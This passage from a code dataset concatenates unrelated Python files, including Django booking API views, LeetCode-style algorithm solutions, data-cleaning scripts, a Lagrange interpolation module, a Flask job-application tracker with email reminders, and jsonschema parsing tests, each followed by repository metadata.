self.request.query_params.get('start', None)\n end = self.request.query_params.get('end', None)\n if start and end:\n # get all within date but ignore cancelled bookings\n queryset = queryset.filter(Q(start__gte=start) | Q(end__lte=end)).exclude(status__exact=\"Cancelled\")\n return queryset\n\n\nclass BookingAdminDetail(generics.RetrieveUpdateDestroyAPIView):\n permission_classes = (permissions.IsAdminUser,)\n queryset = Booking.objects.all()\n serializer_class = BookingAdminSerializer\n\n\nclass BookingAdminList(generics.ListCreateAPIView):\n '''\n Only admins can create new calendar items\n '''\n permission_classes = (permissions.IsAdminUser,)\n serializer_class = BookingAdminSerializer\n\n\n def get_queryset(self):\n \"\"\"\n \"\"\"\n queryset = Booking.objects.all()\n start = self.request.query_params.get('start', None)\n end = self.request.query_params.get('end', None)\n if start and end:\n queryset = queryset.filter(Q(start__gte=start) | Q(end__lte=end))\n return queryset\n\n\nclass BookingPriceAdminDetail(generics.RetrieveUpdateDestroyAPIView):\n permission_classes = (permissions.IsAdminUser,)\n queryset = BookingPrice.objects.all()\n serializer_class = BookingPriceAdminSerializer\n\n\nclass BookingPriceAdminList(generics.ListCreateAPIView):\n '''\n Only admins can create new calendar items\n '''\n permission_classes = (permissions.IsAuthenticatedOrReadOnly,\n IsAdminOrReadOnly,)\n serializer_class = BookingPriceAdminSerializer\n\n\n def get_queryset(self):\n \"\"\"\n \"\"\"\n queryset = BookingPrice.objects.all()\n last = self.request.query_params.get('last', None)\n # if last is not given we'll return all items\n if last:\n # fetch the latest entry only\n queryset = [queryset.order_by('-end')[0:1].get()]\n return queryset\n\n\n","repo_name":"phookit/baytreecottage","sub_path":"phookit/bookingcalendar/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19332569231","text":"def threeSum(nums):\n \"\"\"\n nums: List[int]\n rVal: List[List[int]]\n \"\"\"\n\n result = []\n nums.sort()\n \n for i in range(len(nums)):\n # Run 2Sum on each element's complement\n dict = {}\n target = 0 - nums[i]\n for j in range(len(nums)):\n if i != j:\n complement = target - nums[j]\n if complement in dict:\n newList = sorted([nums[j], complement, nums[i]])\n if newList not in result:\n result.append(newList)\n dict[nums[j]] = j\n \n return result","repo_name":"Abhinavnj/leetcode-solutions","sub_path":"three-sum.py","file_name":"three-sum.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1400582686","text":"import os\nimport json\nimport re\nfrom datetime import datetime\n\ndef load_comments_data_from_corpus(boards=[\"Gossiping\"], years=[2009], basedir='data/corpus/segmented/', ext='.json'):\n \n posts = []\n\n for board in boards:\n for year in years:\n fp = os.path.join(basedir, board, str(year))\n\n for post_name in os.listdir(fp):\n if not post_name.endswith(ext): continue\n post_path = os.path.join(fp, post_name)\n\n with open(post_path) as f:\n data = json.load(f)\n title = titleProcess(data['post_title'])\n\n posts.append({\n 'title': title['title'],\n 'isRe': title['isRe'],\n 'tag': title['tag'],\n 'id': post_name,\n 'board': board,\n 'date': datetime.fromtimestamp(int(data['post_time'])).strftime(\"%Y-%m-%d\"),\n 'author': data['post_author'],\n 'comments': data[\"comments\"],\n 'content': data[\"post_body\"],\n })\n\n return posts\n\n\ndef titleProcess(title: str):\n m = re.match('(^Re: ?)?(\\[(.+)\\] ?)?(.*)', title)\n try:\n out = {\n 'title': m[4],\n 'isRe': 0 if m[1] is None else 1,\n 'tag': m[3]\n }\n except:\n raise Exception(\"RegEx parse error\")\n return out\n\n\ndef segment(str):\n #return jieba.cut(str)\n return [str]\n\n#%%\nif __name__ == \"__main__\":\n \n import json\n with open(\"data/Gossiping/2010/20100103_2339_M.1262533140.A.CFA.json\") as f:\n data = json.load(f)","repo_name":"liao961120/ptt-network","sub_path":"pttnet/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3576486121","text":"import os\n\nallfiles = os.walk(r\"d:\\classroom\\mar27p\\demo\")\n\ncount = 0\nfor (dirname, dirs, files) in allfiles:\n for file in files:\n if file.endswith(\".py\"):\n print(dirname + \"\\\\\" + file)\n count += 1\n\nprint(count)\n","repo_name":"srikanthpragada/PYTHON_27_MAR_2023","sub_path":"demo/libdemo/list_python_files.py","file_name":"list_python_files.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71932801193","text":"import pandas as pd\nimport numpy as np\nfrom collections import defaultdict\n\ndef initial_drop(df):\n \"\"\"\n This function takes the pandas DataFrame containing offensive statistics and\n drops some rows that do not contribute a player's production\n Args:\n df: pandas DataFrame object\n Returns:\n pandas DataFrame\n \"\"\"\n drop_list = ['teamID', 'lgID', 'stint']\n return df.drop(drop_list, axis=1) #cols are dropped inplace, no return necessary\n\ndef combine_stints(df):\n \"\"\"\n This function takes a pandas DataFrame and combines multiple 'stints' in one\n year into one total row for the year regardless of the team played for or league\n played in\n Args:\n df: pandas DataFrame object\n Returns:\n pandas DataFrame object that has combined players' stats across 'stints'\n \"\"\"\n print('Combining multiple stints into single years...')\n df = df.groupby(['playerID', 'yearID']).sum()\n return df.reset_index(level=['playerID', 'yearID'])\n\ndef map_position(batting_df, fielding_df):\n \"\"\"\n This function will use a DataFrame of fielding statistics to find each players'\n most played position and then add that position to the batting_df\n Args:\n batting_df: pandas DataFrame object\n fielding_df: pandas DataFrame object\n Returns:\n pandas DataFrame\n \"\"\"\n print('Mapping positions to batting stats...')\n for player in fielding_df['playerID'].unique():\n idxmax = fielding_df[fielding_df['playerID'] == player]['POS'].value_counts().idxmax()\n batting_df.loc[batting_df['playerID'] == player, 'pos'] = idxmax\n batting_df_dropped_p = batting_df.drop(batting_df[batting_df['pos'] == 'P'].index) # drop pitchers\n batting_df_dropped_p_null = batting_df_dropped_p.dropna() # drop players with no position\n\n return batting_df_dropped_p_null\n\ndef condense_df(df0):\n \"\"\"\n This function condenses all the rows of a players stats over time into one\n row of stats over time\n Args:\n df0: pandas DataFrame\n Returns:\n pandas DataFrame\n \"\"\"\n df = df0.set_index('playerID')\n player_list = []\n for player in df.index.unique():\n def_dict = defaultdict(str)\n def_dict['playerID'] = player\n\n if isinstance(df.loc[player, 'pos'], str):\n def_dict['pos'] = df.loc[player, 'pos']\n else:\n def_dict['pos'] = df.loc[player, 'pos'].unique()[0]\n\n for col in df.columns:\n if col == 'yearID' or col == 'pos':\n continue\n try:\n for i, v in enumerate(df.loc[player, col]):\n if i > 6:\n continue\n key = 'year' + str(i + 1) + '_' + col\n def_dict[key] = v\n except:\n continue # skip players with only 1 year of data\n player_list.append(def_dict)\n new_df = pd.DataFrame(player_list)\n new_df_na_dropped = new_df.dropna() #drop players without 7 years of data\n new_df_w_dummies = pd.get_dummies(new_df_na_dropped, columns=['pos'])\n return new_df_w_dummies\n\ndef trim_batters(df, ab=100):\n # remove those seasons where batter had less than 100 ABs\n df = df[df['AB'] > ab]\n\n # remove batters with less than 7 years experience\n s = df['playerID'].value_counts()\n df = df[df['playerID'].isin(s[s > 6].index)]\n\n # select first 7 seasons\n df = df.groupby('playerID').head(7)\n\n return df.drop(['H', 'AB'], axis=1)\n","repo_name":"aaronmcd1214/Capstone","sub_path":"src/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3346020277","text":"\"\"\"\r\n暴力枚举:超时\r\n\"\"\"\r\n\r\nclass Solution:\r\n def findContinuousSequence(self, target: int):\r\n i = 1\r\n nums = []\r\n result = []\r\n while i < target:\r\n nums.append(i)\r\n i += 1\r\n\r\n for i in range(len(nums) // 2):\r\n for j in range(i, len(nums)):\r\n res = nums[i:j]\r\n if sum(res) == target:\r\n result.append(res)\r\n return result\r\n\r\nprint(Solution().findContinuousSequence(15))\r\n\r\n\"\"\"\r\n利用滑动窗口的思想,\r\n通过双指针实现滑动窗口\r\n\r\n1.当窗口的和小于 target 的时候,窗口的和需要增加,所以要扩大窗口,窗口的右边界向右移动;\r\n2.当窗口的和大于 target 的时候,窗口的和需要减少,所以要缩小窗口,窗口的左边界向右移动;\r\n\r\n3.当窗口的和恰好等于 target 的时候,我们需要记录此时的结果。设此时的窗口为 [i, j),\r\n那么我们已经找到了一个 i开头的序列,也是唯一一个 i开头的序列,接下来需要找 i+1 开头的序列,所以窗口的左边界要向右移动。\r\n\"\"\"\r\n\r\nclass Solution:\r\n def findContinuousSequence(self, target: int):\r\n i = 1\r\n j = 1\r\n sum = 0\r\n result = []\r\n while i <= target // 2:\r\n if sum < target:\r\n sum += j\r\n j += 1\r\n elif sum > target:\r\n sum -= i\r\n i += 1\r\n else:\r\n res = list(range(i, j))\r\n result.append(res)\r\n sum -= i\r\n i += 1\r\n return result","repo_name":"Hegemony/Python-Practice","sub_path":"剑指 Offer/57-2. findContinuousSequence.py","file_name":"57-2. findContinuousSequence.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22657610974","text":"import praw\r\nimport pandas as pd\r\n\r\nreddit = praw.Reddit(client_id='###', client_secret='####', redirect_uri='http://localhost:8080', user_agent='webscrapping')\r\n\r\nposts=[]\r\nhot_posts= reddit.subreddit('pennystocks')\r\n\r\nfor post in hot_posts.new(limit=5) :\r\n posts.append([post.title, post.url])\r\n\r\nposts = pd.DataFrame(posts, columns= ['title', 'url'])\r\nprint(posts)\r\n","repo_name":"Amimaht/Webscraper","sub_path":"redditScraper.py","file_name":"redditScraper.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33340572161","text":"class Solution:\n def subarraysDivByK(self, nums: List[int], k: int) -> int:\n n = len(nums)\n prefix = [0]\n for num in nums:\n prefix.append((prefix[-1]+(num%k))%k)\n res = 0\n freq = defaultdict(int)\n for i in range(n+1):\n if freq[prefix[i]]:\n res += freq[prefix[i]]\n freq[prefix[i]] += 1\n return res\n ","repo_name":"natitedros/Competitive-Programming","sub_path":"Prefix Sum/SubarraySumsDivisibleByK.py","file_name":"SubarraySumsDivisibleByK.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6567104193","text":"#! /usr/bin/env python\n\nimport clip, logging, logtool\nfrom .config import Config, load_config\n\nLOG = logging.getLogger (__name__)\n\n@logtool.log_call\ndef do (**kwargs):\n load_config (kwargs[\"templates\"])\n f = kwargs.get (\"output\")\n formats = (None, \"JSON\", \"json\", \"YAML\", \"yaml\", \"yml\", \"TOML\", \"toml\")\n if f not in formats:\n clip.exit (err = True,\n message = \"Unknown format (%s), not one of: %s\" % (f, formats))\n print (Config.dumps (form = f))\n","repo_name":"clearclaw/xxpaper","sub_path":"xxpaper/cmd_dump.py","file_name":"cmd_dump.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"72"} +{"seq_id":"40013445158","text":"from __future__ import annotations\nimport atexit\nimport re\nfrom typing import Match, Optional\nfrom logging import basicConfig, DEBUG\nimport locale\nimport os\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom pytz import timezone\nfrom flask import Flask, request, flash, url_for, redirect, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom sqlalchemy import DateTime, desc\nfrom validators import url\nfrom apscheduler.schedulers.background import BackgroundScheduler\nimport logging\nfrom tools.send_emails import send_email\n\napp = Flask(__name__, static_folder='static', static_url_path='/static')\n# Set the environment (development, production, etc.)\n# Replace 'development' with the appropriate value for your environment\napp.config.from_object('config.Config')\n\ntoolbar = DebugToolbarExtension(app)\nparis = timezone('Europe/Paris')\nregex = r'\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,7}\\b'\n\ndb = SQLAlchemy(app)\nlocale.setlocale(locale.LC_TIME, 'fr_FR')\nbasicConfig(level=DEBUG)\n\n\nclass Job(db.Model):\n id = db.Column('job_id', db.Integer, primary_key=True)\n name = db.Column(db.String(100))\n url = db.Column(db.String(100))\n zipCode = db.Column(db.String(5))\n company = db.Column(db.String(20))\n contact = db.Column(db.String(20))\n email = db.Column(db.String(40))\n applicationDate = db.Column(db.DateTime, nullable=False)\n active = db.Column(db.Integer)\n is_capture = db.Column(db.Integer)\n relaunchDate = db.Column(db.DateTime)\n refusalDate = db.Column(db.DateTime)\n\n def __repr__(self):\n return f'{self.name}'\n\n def __init__(self, name: str, url: str, zipCode: str, company: str, contact: str, date: DateTime, email: str):\n self.name = name\n self.url = url\n self.zipCode = zipCode\n self.company = company\n self.contact = contact\n self.applicationDate = date\n self.email = email\n self.relaunchDate = None\n self.refusalDate = None\n self.active = True\n\n @property\n def valid_url(self) -> bool:\n try:\n result = url(self.url)\n # request_response = requests.head(self.url)\n except Exception:\n return False\n return result\n\n @property\n def first_name(self) -> Optional[str]:\n return self.contact.split()[0] if self.contact else ''\n\n @property\n def expired(self) -> bool:\n if not self.refusalDate and self.email:\n # app.logger.debug(self.first_name)\n # Calculate the difference between the two dates\n if self.relaunchDate:\n difference = relativedelta(datetime.now(), self.relaunchDate)\n return difference.months >= 1\n else:\n difference = relativedelta(datetime.now(), self.applicationDate)\n app.logger.debug(self.applicationDate)\n app.logger.debug(f'{difference.days} days - {difference.months} months')\n return difference.days >= 10\n return False\n\n def capture_exists(self) -> bool:\n path = os.path.dirname(__file__)\n file_name: str = f'capture_{self.id}.pdf'\n return os.path.isfile(f'{path}/static/images/{file_name}')\n\n\ndef check(email: str) -> Match[str] | None:\n return re.fullmatch(regex, email)\n\n\ndef send_fake_email(job: Job, author: str, cv_resume: str) -> bool:\n if job.name == 'Prise de contact':\n subject: str = f'Relance suite prise de contact'\n content: str = f'''Nous avons échangé le {job.applicationDate.strftime('%d %B %Y')} concernant des offres d'emploi auprès de votre société pouvant correspondre à mon profil.
    \n
    \nJe me permets de vous relancer mensuellement pour connaître le statut d'avancement de ma candidature auprès de votre société.
    \n'''\n else:\n subject: str = f'Relance candidature {job.name}'\n content: str = f'''J'ai postulé le {job.applicationDate.strftime('%d %B %Y')} à l'offre \\\"{job.name}\\\" au sein de votre société.

    \nJe me permets de vous demander si ce poste est toujours vacant et si dans le cas contraire, vous auriez actuellement des missions en adéquation avec mon profil.
    \n'''\n\n body = f'''Bonjour {job.first_name},
    \n
    {content}
    \nEn vous remerciant pour votre retour.
    \n
    \nCordialement,
    \n{author}.
    \n{cv_resume}.
    \n(mail généré par automate Flask-APScheduler)'''\n\n # if send_email_old(to=job.email, subject=f'Relance candidature {job.name}', body=body):\n if send_email(subject=subject,\n body=body,\n sender_email=app.config['GMAIL_USER'],\n recipient_email=f'\"{job.first_name}\"<{job.email}>',\n bcc_recipients=[app.config['GMAIL_USER']],\n smtp_server=app.config['SMTP_SERVER'],\n smtp_port=app.config['SMTP_PORT'],\n username=app.config['GMAIL_USER'],\n password=app.config['GMAIL_APP_PWD'],\n author=app.config['GMAIL_FULLNAME'],\n ):\n job.relaunchDate = datetime.now(paris)\n db.session.commit()\n return True\n return False\n\n\ndef send_reminders():\n with app.app_context():\n # date: str = datetime.now().strftime(\"%A, %d. %B %Y %I:%M:%S %p\")\n jobs = Job.query.filter(Job.active).all() if app.config['ALL_CONTACTS'] else Job.query.filter((Job.active) & (Job.contact == 'Fifi')).all()\n for job in jobs:\n if not job.refusalDate and job.email:\n app.logger.debug(job.first_name)\n # Calculate the difference between the two dates\n if job.relaunchDate:\n difference = relativedelta(datetime.now(), job.relaunchDate)\n else:\n difference = relativedelta(datetime.now(), job.applicationDate)\n # app.logger.debug(f'months = {difference.months} - days = {difference.days}')\n if difference.months >= 1: # and difference.years == 0 and difference.days == 0:\n if send_fake_email(job=job, author=app.config['GMAIL_FULLNAME'], cv_resume=app.config['CV_RESUME']):\n app.logger.debug(f'Message sent to {job.email}.')\n\n\n# if __name__ == '__main__':\n\n@app.route('/')\ndef show_all():\n app.logger.debug('This is a debug message.')\n # Reverse order query\n jobs = Job.query.filter(Job.active).order_by(desc(Job.applicationDate)).all()\n return render_template('index.html', jobs=jobs)\n\n\n@app.route('/new/', methods=['GET', 'POST'])\ndef new():\n if request.method == 'POST':\n email: str = request.form['email']\n if not (request.form['name'] and request.form['url'] and request.form['company']):\n flash('Please enter all the fields', 'error')\n elif email and not check(email):\n flash(f'Invalid E-Mail {email}!', 'error')\n else:\n job = Job(name=request.form['name'], url=request.form['url'],\n zipCode=request.form['zipCode'], company=request.form['company'],\n contact=request.form['contact'], date=datetime.now(paris), email=email)\n # logging.warning(\"See this message in Flask Debug Toolbar!\")\n job.is_capture = job.capture_exists()\n db.session.add(job)\n db.session.commit()\n flash('Record was successfully added')\n return redirect(url_for('show_all'))\n # return render_template('index.html')\n\n\n@app.route('/delete/', methods=['GET', 'POST'])\ndef delete(id):\n app.logger.debug(f'Delete job #{id}')\n if request.method == 'GET':\n job = Job.query.get_or_404(id)\n app.logger.debug(f'Job debug: {job}')\n # db.session.delete(job)\n job.active = False\n db.session.commit()\n flash(f'Job offer \\\"{job.name}\\\" from \\\"{job.contact}\\\" was disabled!')\n return redirect(url_for('show_all'))\n\n\n@app.route('/update/', methods=['GET', 'POST'])\ndef update(id):\n job: Job = Job.query.get_or_404(id)\n if request.method == 'POST':\n job.name = request.form.get('name')\n job.url = request.form.get('url')\n job.zipCode = request.form.get('zipCode')\n job.company = request.form.get('company')\n job.contact = request.form.get('contact')\n job.email = request.form.get('email')\n application_date: str = request.form.get('applicationDate')\n app.logger.debug(f'application_date: {application_date}')\n job.applicationDate = datetime.strptime(application_date, '%Y-%m-%d') if application_date else None\n relaunch_date: str = request.form.get('relaunchDate')\n job.relaunchDate = datetime.strptime(relaunch_date, '%Y-%m-%d') if relaunch_date else None\n refusal_date: str = request.form.get('refusalDate')\n job.refusalDate = datetime.strptime(refusal_date, '%Y-%m-%d') if refusal_date else None\n db.session.commit()\n flash('Record was successfully updated')\n return redirect(url_for('show_all'))\n else:\n return render_template('update.html', job=job)\n\n\n@app.before_request\ndef create_tables():\n db.create_all()\n\n\n@app.before_request\ndef create_captures_dir():\n directory_path = f'{os.path.dirname(__file__)}/static/images'\n if not os.path.exists(directory_path):\n try:\n os.mkdir(directory_path)\n print(f\"Directory {directory_path} created successfully.\")\n except Exception as e:\n print(f\"Error creating directory: {e}\")\n\n\n# if app.config['SCHEDULER']:\n# app.logger.debug(app.config['SCHEDULER'])\n# scheduler = BackgroundScheduler()\n# scheduler.add_job(func=send_reminders, trigger=\"interval\", seconds=app.config['SCHEDULER_INTERVAL'])\n# scheduler.start()\n#\n# # Shut down the scheduler when exiting the app\n# atexit.register(lambda: scheduler.shutdown())\n\n# app.run()\n# toolbar.init_app(app)\n# app.run(debug=True, use_debugger=True, use_reloader=False)\n","repo_name":"pmourey/jobs","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4356553836","text":"import json\nfrom os import error\n\ndocs = {\n \"elipsis\": False,\n \"set\": set()\n}\n\nclass Products:\n def __init__(self, action=None, values=None) -> None:\n if values is None or action not in [\"add\", \"remove\", \"edit\"] or action is None: return None \n self.values = values; self.action = action\n if self.action.lower() == 'add': self.add()\n elif self.action.lower() == 'remove': self.remove()\n elif self.action.lower() == 'edit': self.edit()\n\n def add(self):\n self.id = self.values['id']\n before = json.load(open('products.json'))\n try: before[str(self.id)]; self.error = True\n except:\n before[str(self.id)] = {\n \"id\": self.id,\n \"details\": self.values['details'],\n \"picture\": self.values['picture'],\n \"price\": self.values['price'],\n \"name\": self.values['name'] \n }\n try:\n open('products.json', 'w').write(json.dumps(before, indent=4, sort_keys=True))\n self.error = False\n except:\n self.error = True\n\n def remove(self):\n self.id = self.values['id']\n before = json.load(open('products.json'))\n try: \n del before[str(self.id)]\n try:\n open('products.json', 'w').write(json.dumps(before, indent=4, sort_keys=True))\n self.error = False\n except:\n self.error = True\n except:\n self.error = True\n def edit(self):\n self.id = self.values['id']\n before = json.load(open('products.json'))\n try: \n before[str(self.id)] = self.values\n try:\n open('products.json', 'w').write(json.dumps(before, indent=4, sort_keys=True))\n self.error = False\n except:\n self.error = True\n except:\n self.error = True\nProducts(action='add', values={\n \"id\": 7,\n \"details\": \"Z\",\n \"picture\": \"https://picture.com/\",\n \"price\": 100,\n \"name\": \"Product Name\"\n})\n","repo_name":"1ExtremeDev/ProductsParser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23115400469","text":"import numpy as np\nimport scipy.interpolate as interp\nimport warnings\nimport sys\nimport copy\nimport itertools as it\n\nwarnings.simplefilter('ignore', np.RankWarning)\n\n\ndef interp_list():\n return Lagrange_interpolator.__subclasses__()\n\ncolor = {\n 'blue': (0.06, 0.62, 0.91),\n 'green': (0.01, 0.84, 0.35),\n 'pink': (1., 0., 0.5),\n 'red': (0.97, 0.14, 0.05),\n}\n\nclass Lagrange_interpolator():\n _name = \"generic Lagrange interpolator\"\n _color = (0., 0., 0.)\n def __init__(self, x, y, args = ()):\n self.x = np.asanyarray(x, dtype = 'float64')\n self.y = np.asanyarray(y, dtype = 'float64')\n if self.x.size != self.y.size:\n print(\"Error: wrong parameters (x and y must have the same length !)\")\n sys.exit()\n self.n = self.x.size\n self.args = args\n self._build()\n def __str__(self):\n return self._name\n\n\nclass scipy_Lagrange(Lagrange_interpolator):\n \"\"\"\n Interpolation with the scipy module\n \"\"\"\n _name = \"scipy\"\n _color = color['blue']\n def _build(self):\n #self.p = np.poly1d(np.polyfit(self.x, self.y, self.n))\n self.p = interp.lagrange(self.x, self.y)\n def eval(self, xx):\n return self.p(xx)\n\n\nclass vdm(Lagrange_interpolator):\n \"\"\"\n Interpolation with the Vandermonde matrices\n the polynomial is written in the canonical basis\n \"\"\"\n _name = \"vandermonde\"\n _color = color['red']\n def _build(self):\n # build the Vandermonde matrix\n A = np.ones((self.n, self.n))\n for k in range(1, self.n):\n A[:, k] = A[:, k-1] * self.x\n # solve the linear system\n self.p = np.linalg.solve(A, self.y)\n def eval(self, xx):\n # evaluate the polynomial with the Horner algorithm\n xx = np.asanyarray(xx, dtype = 'float64')\n yy = np.zeros(xx.shape)\n for k in range(self.n-1,-1,-1):\n yy *= xx\n yy += self.p[k]\n return yy if xx.size != 1 else np.asscalar(yy)\n\n\nclass Lagrange(Lagrange_interpolator):\n \"\"\"\n Interpolation with the Lagrange formula\n the polynomial is written in the dual basis of the interpolation points\n\n P(x) = \\sum_{i=1}^n y_i/((x-x_i)\\omega'_n(x_i)) / \\sum_{i=1}^n 1/((x-x_i)\\omega'_n(x_i))\n \"\"\"\n _name = \"Lagrange\"\n _color = color['pink']\n def _build(self):\n # build the omega'_n(x_i)\n w = np.ones((self.n, ))\n for i in range(self.n):\n for j in it.chain(range(i), range(i+1, self.n)):\n w[i] *= (self.x[i] - self.x[j])\n self.weight = 1./w\n def eval(self, xx):\n # evaluate the polynomial\n if xx.size == 1:\n N, D = 0., 0.\n for i in range(self.n):\n if xx == self.x[i]:\n return self.y[i]\n dxi = self.weight[i] / (xx-self.x[i])\n N += self.y[i] * dxi\n D += dxi\n else:\n N, D = np.zeros(xx.shape), np.zeros(xx.shape)\n ind = []\n for i in range(self.n):\n ind.append(np.where(xx == self.x[i])) # indices where P(xi) = yi\n indloc = np.where(xx != self.x[i])\n dxi = self.weight[i] / (xx[indloc] - self.x[i]) # avoid divide by 0\n N[indloc] += self.y[i] * dxi\n D[indloc] += dxi\n for i in range(self.n): # fix yi in xi\n N[ind[i]], D[ind[i]] = self.y[i], 1.\n return N / D\n\n\nclass divided_differences(Lagrange_interpolator):\n \"\"\"\n Interpolation using the divided differences method\n the polynomial is written in the basis of the omega_k\n\n omega_0 = 1\n omega_j = (X-x_1)...(X-x_j), 1 \\leq j \\leq n\n\n P = \\sum_{k=0}^{n-1} d_{k,k} omega_k\n \"\"\"\n _name = \"divided differences\"\n _color = color['green']\n def _build(self):\n # build the divided differences\n self.d = copy.copy(self.y)\n for i in range(1, self.n):\n self.d[i:] = (self.d[i:] - self.d[i-1:-1]) / (self.x[i:] - self.x[:self.n-i])\n def eval(self, xx):\n xx = np.asanyarray(xx, dtype = 'float64')\n yy = self.d[-1] * np.ones(xx.shape)\n for k in range(self.n-2, -1, -1):\n yy *= xx - self.x[k]\n yy += self.d[k]\n return yy if xx.size != 1 else np.asscalar(yy)\n","repo_name":"Phinease/Numerical_modeling_and_simulation","sub_path":"lib/pyInterp.py","file_name":"pyInterp.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30790605303","text":"import pytest\nfrom dataformats.jsonschema.custom_types import SchemaType\nfrom dataformats.jsonschema.json_pointer import Pointer\nfrom dataformats.jsonschema.mixins.schema_parsing import (\n absolute_id_map,\n find_parent_pointers,\n find_schemas,\n flatten_json,\n is_absolute,\n normalize,\n ref_map,\n)\n\n\ndef test_flatten_json():\n json_schema: SchemaType = {\"properties\": {\"somekey\": {\"allOf\": [{\"default\": \"somevalue\"}]}}}\n flat_json_schema = flatten_json(json_schema)\n assert flat_json_schema[Pointer.from_string(\"/properties\")] == json_schema[\"properties\"]\n assert flat_json_schema[Pointer.from_string(\"/properties/somekey\")] == json_schema[\"properties\"][\"somekey\"] # type: ignore\n assert flat_json_schema[Pointer.from_string(\"/properties/somekey/allOf\")] == json_schema[\"properties\"][\"somekey\"][\"allOf\"] # type: ignore\n assert flat_json_schema[Pointer.from_string(\"/properties/somekey/allOf/0\")] == json_schema[\"properties\"][\"somekey\"][\"allOf\"][0] # type: ignore\n assert flat_json_schema[Pointer.from_string(\"/properties/somekey/allOf/0/default\")] == json_schema[\"properties\"][\"somekey\"][\"allOf\"][0][\"default\"] # type: ignore\n\n\ndef test_find_schemas():\n top_level_schema = {\"definitions\": {\"a\": {\"id\": \"subschema\"}}, \"not-a-schema\": {\"type\": \"str\"}}\n schemas = find_schemas(top_level_schema)\n # assert Pointer() in schemas\n assert Pointer.from_string(\"/definitions/a\") in schemas\n assert Pointer.from_string(\"/note-a-schema\") not in schemas\n\n\ndef test_find_schemas_():\n schema: SchemaType = {\n \"definitions\": {\n \"actual ref\": {\"$ref\": \"#\"},\n }\n }\n schemas = find_schemas(schema)\n assert len(schemas) == 2\n\n\ndef test_find_parent_pointer():\n child = Pointer.from_string(\"/some/nested/pointer\")\n possible_parents = [\n Pointer.from_string(\"/some/nested\"),\n Pointer.from_string(\"/some\"),\n Pointer.from_string(\"\"),\n Pointer.from_string(\"i dont belong here\"),\n ]\n parent_iterator = find_parent_pointers(child, possible_parents)\n assert next(parent_iterator) == possible_parents[0]\n assert next(parent_iterator) == possible_parents[1]\n assert next(parent_iterator) == possible_parents[2]\n with pytest.raises(StopIteration):\n next(parent_iterator)\n\n\ndef test_normalize_defrag():\n uri = \"HTTPs://www.ugLy.com/with space/index.html#fragment\"\n normalized_uri = normalize(uri, defrag=True)\n assert normalized_uri == \"https://www.ugly.com/with%20space/index.html\"\n\n\ndef test_normalize_no_defrag():\n uri = \"HTTPs://www.ugLy.com/with space/index.html#fragment\"\n normalized_uri = normalize(uri, defrag=False)\n assert normalized_uri == \"https://www.ugly.com/with%20space/index.html#fragment\"\n\n\ndef test_is_absolute():\n assert is_absolute(\"file://somepath\")\n assert is_absolute(\"https://www.jsonschema.org/\")\n assert not is_absolute(\"other_schema.json\")\n assert not is_absolute(\"../sibling.json#/defintions/a\")\n\n\ndef test_absolute_id_map():\n schema = {\n \"id\": \"https://schemstore.com/schemas/example.json\",\n \"definitions\": {\n \"relative_change\": {\"id\": \"other.json\"},\n \"relative_change_with_fragment\": {\"id\": \"another.json#withfragment\"},\n \"nested\": {\n \"id\": \"https://nested.com/parent.json\",\n \"items\": {\"$comment\": \"resolves to https://nested.com/child.json\", \"id\": \"child.json\"},\n },\n },\n }\n absolute_ids = absolute_id_map(schema)\n # raise ValueError(absolute_ids.keys())\n assert absolute_ids[Pointer.from_string(\"\")] == \"https://schemstore.com/schemas/example.json\"\n assert (\n absolute_ids[Pointer.from_string(\"/definitions/relative_change\")] == \"https://schemstore.com/schemas/other.json\"\n )\n assert (\n absolute_ids[Pointer.from_string(\"/definitions/relative_change_with_fragment\")]\n == \"https://schemstore.com/schemas/another.json\"\n )\n assert absolute_ids[Pointer.from_string(\"/definitions/nested/items\")] == \"https://nested.com/child.json\"\n\n\ndef test_ref_map():\n schema: SchemaType = {\n \"definitions\": {\n \"not a ref\": {\"$ref\": 0},\n \"also not ref\": {\"enum\": [{\"$ref\": \"#\"}]},\n \"actual ref\": {\"$ref\": \"#\"},\n \"ref deleted twice\": {\"enum\": {\"default\": \"$ref\"}},\n }\n }\n refs = ref_map(schema)\n assert len(refs) == 1\n assert Pointer.from_string(\"/definitions/actual ref\") in refs\n\n\n@pytest.mark.xfail(\n raises=ValueError,\n reason=\"This should never occur, the id should always be set or fail when trying to do a relative deref without known id\",\n)\ndef test_id_map_no_id_top_level():\n schema: SchemaType = {\n \"properties\": {\n \"derefenced_relative_id\": {\n \"id\": \"some_relative_id/i-was-imported.json\",\n 